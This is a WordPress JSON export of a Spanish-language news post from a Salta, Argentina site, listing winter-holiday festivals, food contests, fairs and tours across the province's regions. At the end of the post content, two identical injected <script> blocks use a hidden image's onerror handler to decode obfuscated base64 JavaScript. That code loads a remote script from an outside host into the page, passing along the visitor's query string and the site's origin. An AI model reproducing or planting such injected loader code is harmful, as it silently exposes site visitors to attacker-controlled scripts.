{"id":4202,"date":"2024-07-19T10:54:05","date_gmt":"2024-07-19T13:54:05","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4202"},"modified":"2025-08-13T23:52:43","modified_gmt":"2025-08-14T02:52:43","slug":"salta-te-propone-un-calendario-colmado-de-actividades-para-conquistarte-este-fin-de-semana","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4202","title":{"rendered":"Salta te propone un calendario colmado de actividades para conquistarte este fin de semana"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-6e46cfbabde3a367a2c445a04e2b0bb9\" style=\"background-color:#830424\"><em>De las m\u00e1s de 1200 actividades organizadas para el invierno, se destacan el Concurso del Locro en San Lorenzo, la Fiesta de la Papa Andina en El Alfarcito, el Encuentro Nacional de Doma y Festival del Tamal en Chicoana, la Fiesta Provincial del Pimiento en Payogasta y el Concurso de la Comida Vallista en Cachi.<\/em><\/h4>\n\n\n\n<p>El Ministerio de Turismo y Deportes cuenta con un completo programa de actividades, organizadas por el sector privado y por los gobiernos municipales, para conquistar a salte\u00f1os y visitantes durante estas vacaciones. El calendario completo se puede consultar en&nbsp;www.saltacalendario.gob.ar.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13019-foto-de-archivo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13019-foto-de-archivo.jpg\" alt=\"Foto de archivo.\" style=\"width:361px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>A continuaci\u00f3n las actividades que se realizar\u00e1n en las 7 regiones de la Provincia desde el jueves 18 hasta el martes 21 de julio. Los horarios se pueden consultar en los centros de visitantes de cada lugar.<\/p>\n\n\n\n<p>En la&nbsp;Ciudad de Salta, los d\u00edas jueves 18, viernes 19 y domingo 21 se podr\u00e1 disfrutar de distintos circuitos guiados en bicicleta, pudiendo ir desde el Monumento 20 de Febrero hasta el Monumento a G\u00fcemes, o bien, desde la Plaza del Deporte de Tres Cerritos recorriendo los murales de artistas salte\u00f1os plasmados en los edificios de Parque Belgrano.<\/p>\n\n\n\n<p>Asimismo en el Mercado Artesanal durante el fin de semana se realizar\u00e1 la feria de artesan\u00edas con exposici\u00f3n y venta de artesan\u00edas de comunidades de Aguaray, actividades para infancias, conversatorio de comunidades originarias, y corso de invierno.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13020-foto-de-archivo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13020-foto-de-archivo.jpg\" alt=\"Foto de archivo.\" style=\"width:422px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>A 10 kil\u00f3metros de la ciudad, en&nbsp;San Lorenzo&nbsp;el s\u00e1bado 20 se realizar\u00e1 el primer concurso del locro en la Plaza Ej\u00e9rcito Argentino con feria de comidas regionales, pe\u00f1a con m\u00fasica y danzas folcl\u00f3ricas. A esta actividad se suman las visitas al Museo del Autom\u00f3vil y el Museo Did\u00e1ctico de la Gesta G\u00fcemesiana y Gaucha; degustaciones de vinos artesanales en la Bodega Martearena, paseos guiados por el circuito interpretativo de la Quebrada de San Lorenzo; recorrido en bus tur\u00edstico por los principales puntos de inter\u00e9s; talleres folcl\u00f3ricos en la pasarela de la Quebrada; gastronom\u00eda en el Paseo Parque Costanera y en la feria regional El Zorzal; y trekking por la Reserva Las Yungas.<\/p>\n\n\n\n<p>En la regi\u00f3n del&nbsp;Valle de Lerma&nbsp;se puede disfrutar en la localidad de&nbsp;Campo Quijano, los d\u00edas jueves 18 y viernes 19, de la Feria de Artesanos del Tren, de los paseos guiados pedestres y gratuitos por la estaci\u00f3n de trenes o el casco c\u00e9ntrico; y visitar del Museo del Tren. Adem\u00e1s el s\u00e1bado 20 se realizar\u00e1 una nueva edici\u00f3n de la Fiesta y Feria de la Papa Andina en el El Alfarcito, y el domingo 21 tendr\u00e1n lugar diferentes ferias de artesanos en el Viaducto El Toro, Plaza Mart\u00edn Fierro y Plaza 8 de diciembre de La Silleta, donde tambi\u00e9n se llevar\u00e1 adelante el concurso de la tortilla a la parrilla.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13021-foto-de-archivo.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13021-foto-de-archivo.jpg\" alt=\"Foto de archivo.\" style=\"width:343px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>En la localidad de&nbsp;Chicoana&nbsp;el viernes 19 se realizar\u00e1 el concurso del tamal; y el s\u00e1bado 20 y domingo 21 en la Casa de la Tradici\u00f3n tendr\u00e1 lugar el 39\u00ba Encuentro Nacional de Doma y Festival del Tamal, donde se realizar\u00e1 el concurso de doma en sus distintas categor\u00edas, se elegir\u00e1 a la paisana nacional y se podr\u00e1 disfrutar de la m\u00fasica de importantes artistas.<\/p>\n\n\n\n<p>Pasando a los&nbsp;Valles Calchaqu\u00edes, en&nbsp;Cafayate&nbsp;habr\u00e1 distintas actividades durante todo el fin de semana, entre ellas una muestra fotogr\u00e1fica de las etapas de la vid, bit\u00e1cora viajeros en movimiento con juegos para toda la familia y un encuentro de bandoneones en el Museo de la Vid y el Vino; encuentro de artesanos en la Plaza Principal; corsos de invierno; y distintas obras de teatro en el nuevo Cine Teatro Municipal.<\/p>\n\n\n\n<p>Por su parte, en&nbsp;Cachi&nbsp;todos los d\u00edas se realizar\u00e1n guiados acompa\u00f1ados de anfitriones locales para que turistas y visitantes descubran un \u201cpueblo aut\u00e9ntico\u201d y habr\u00e1 una&nbsp; muestra fotogr\u00e1fica en la Casa de la Cultura; mientras que el 18 y 19 se har\u00e1 una exposici\u00f3n de morteros y pecanas en la Plaza Principal, asimismo el viernes tendr\u00e1 lugar un desfile de indumentaria y textiles artesanales en el Sal\u00f3n Municipal; y el s\u00e1bado 20 ser\u00e1&nbsp;el fog\u00f3n de la amistad en la Plaza Principal y&nbsp;el Concurso&nbsp;de la Comida Vallista en la Plaza Seca, donde se podr\u00e1 disfrutar de la feria de artesan\u00edas y emprendedores, comidas regionales, m\u00fasica en vivo y danzas tradicionales.&nbsp;<\/p>\n\n\n\n<p>En tanto, en&nbsp;San Carlos&nbsp;desde el jueves se llevar\u00e1 adelante una nueva edici\u00f3n de Barro Calchaqu\u00ed, un encuentro latinoamericano de ceramistas; y se har\u00e1 la Feria el Mirador del Sol en el paraje San Lucas a 8 km. del pueblo. El s\u00e1bado 20 y el domingo 21 salte\u00f1os y turistas podr\u00e1n vivir una nueva edici\u00f3n del Festival del Sol y Concurso de la empanada y el vino en la Plaza 4 de Noviembre de la localidad.<\/p>\n\n\n\n<p>Por otro lado, en&nbsp;Payogasta&nbsp;el s\u00e1bado 20 se realizar\u00e1 &nbsp;la 51\u00ba edici\u00f3n de la Fiesta Provincial del Pimiento; y en el municipio de&nbsp;Seclant\u00e1s&nbsp;ser\u00e1 su Fiesta Patronal.<\/p>\n\n\n\n<p>Pasando al&nbsp;Valle Hist\u00f3rico y Gaucho, en&nbsp;Met\u00e1n&nbsp;el viernes 19&nbsp;&nbsp;habr\u00e1 una noche de tango en la Casa de la Cultura, y el s\u00e1bado 20 y domingo 21 la 5ta fecha del Campeonato de Enduro. En la localidad de&nbsp;El Galp\u00f3n&nbsp;el 18 se presentar\u00e1 la Academia Municipal Ceibal, el 20 el concurso de la empanada y festival folcl\u00f3rico; y el domingo 21 la carrera cuadrera \u201cCopa San Francisco Solano\u201d; ese mismo d\u00eda en&nbsp;General G\u00fcemes&nbsp;ser\u00e1 el cierre de las vacaciones de invierno con cine m\u00f3vil, juegos y show de payasos.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13022-foto-de-archivo.jpeg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13022-foto-de-archivo.jpeg\" alt=\"Foto de archivo.\"\/><\/a><\/figure>\n\n\n\n<p>Asimismo, en&nbsp;Apolinario Saravia&nbsp;el jueves 18 habr\u00e1 clases de tango y el viernes 19 taller literario de cuentos y teatro de t\u00edteres para los m\u00e1s peque\u00f1os; y el s\u00e1bado 20&nbsp;en&nbsp;La Candelaria&nbsp;se realizar\u00e1 el festejo del d\u00eda del amigo con mateada y distintas actividades en la Plaza Hip\u00f3lito Irigoyen, y en&nbsp;El Tala&nbsp;se celebrar\u00e1 su 151\u00ba Aniversario con desfile de agrupaciones, destrezas gauchas y espect\u00e1culos musicales.<\/p>\n\n\n\n<p>Por su parte, en la regi\u00f3n&nbsp;Selva de Monta\u00f1a, en&nbsp;Aguaray&nbsp;el jueves 18 y el viernes 19 se realizar\u00e1n la salida del recorrido turista por 1 d\u00eda para ni\u00f1os y ni\u00f1as entre los 7 a 10 a\u00f1os y 11 a 13 a\u00f1os, respectivamente; y el domingo 21 habr\u00e1 una feria gastron\u00f3mica y artesanal en el Paseo Juan Carlos Alcoba.<\/p>\n\n\n\n<p>En el municipio de&nbsp;Tartagal&nbsp;el viernes 19 ser\u00e1 la Eco Kermesse en la Plazoleta Ciriaco Ben\u00edtez, dedicada a promover la conciencia ambiental; y el domingo 21 su feria en la Plaza San Mart\u00edn, &nbsp;donde se encuentran artesanos, emprendedores y dise\u00f1adores artesanales.<\/p>\n\n\n\n<p>Finalmente, en la regi\u00f3n Puna de los Andes,&nbsp;San Antonio de los Cobres&nbsp;ofrece durante todo el fin de semana una gran variedad de actividades, algunas de ellas son: experiencia tejido en telar \u201cPicote de Barracan\u201d, visita al Santuario de la Pachamama, paseo a la cruz \u201cSalva tu Alma\u201d, cine cultural y guiados especiales por las nuevas salas, todas en el Museo Regional Andino. Adem\u00e1s, en el taller de cer\u00e1mica se realizar\u00e1 la experiencia Thuru Maky; en la Casa Anatolio un paseo en llamas; en el Mercado Artesanal guiados diarios, y las experiencias \u201cEntre Lanas\u201d y \u201cRica y Jugosa\u201d. Asimismo en el municipio se podr\u00e1 realizar trekking nocturnos por el Cerro Terciopelo y Camino y Piedra.<\/p>\n\n\n\n<p>A estas actividades se suma la oferta de aventura, naturaleza y gastronom\u00eda que invitan a disfrutar de Salta con todos los sentidos; desde el aire en globo aerost\u00e1tico, rafting en el ca\u00f1\u00f3n del r\u00edo Juramento, actividades n\u00e1uticas en el dique Cabra Corral, de una empanadas y de un vino de altura.<\/p>\n\n\n\n<p>El calendario completo se puede consultar en&nbsp;<a href=\"http:\/\/www.saltacalendario.gob.ar.\/\">http:\/\/www.saltacalendario.gob.ar.<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>De las m\u00e1s de 1200 actividades organizadas para el invierno, se destacan el Concurso del Locro en San Lorenzo, la Fiesta de la Papa Andina en El Alfarcito, el Encuentro Nacional de Doma y Festival del Tamal en Chicoana, la Fiesta Provincial del Pimiento en Payogasta y el Concurso de la Comida Vallista en Cachi. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4203,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,15],"tags":[],"class_list":{"0":"post-4202","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4202"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4202"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4202\/revisions"}],"predecessor-version":[{"id":6740,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4202\/revisions\/6740"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4203"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4202"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4202"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4202"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}